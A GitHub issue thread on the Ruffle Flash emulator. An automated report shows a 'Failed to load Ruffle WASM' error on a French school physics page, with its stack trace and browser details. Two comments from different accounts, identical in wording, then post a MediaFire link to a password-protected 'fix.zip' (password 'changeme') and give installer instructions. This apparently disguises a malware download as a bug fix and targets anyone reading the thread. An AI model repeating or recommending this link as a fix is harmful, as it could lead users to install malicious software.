### ISSUE TITLE
Error on https://www.pccl.fr/physique_chimie_college_lycee/quatrieme/chimie/etats_eau_flash.htm

### ISSUE THREAD

**Issue by Liketeen** [ruffle-rs/ruffle#17648]
# Error Info
Error name: Error
Error message: Failed to load Ruffle WASM
Error stack:
```
Error: Failed to load Ruffle WASM
    at https://www.pccl.fr/ruffle/ruffle.js:1:310992
    at async on.ensureFreshInstance (https://www.pccl.fr/ruffle/ruffle.js:1:310870)
    at async on.load (https://www.pccl.fr/ruffle/ruffle.js:1:314088)
    at async kn.load (https://www.pccl.fr/ruffle/ruffle.js:1:332923)
```

# Player Info
Allows script access: true

# Page Info
Page URL: https://www.pccl.fr/physique_chimie_college_lycee/quatrieme/chimie/etats_eau_flash.htm

# Browser Info
User Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/25.0 Chrome/121.0.0.0 Mobile Safari/537.36
Platform: Linux armv81
Has touch support: true

# Ruffle Info
Version: 0.1.0
Name: nightly 2024-08-20
Channel: nightly
Built: 2024-08-20T00:05:43.275Z
Commit: 5b3c9722d5664b1240c4409e992d2816da08d612
Is extension: false

# Metadata

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
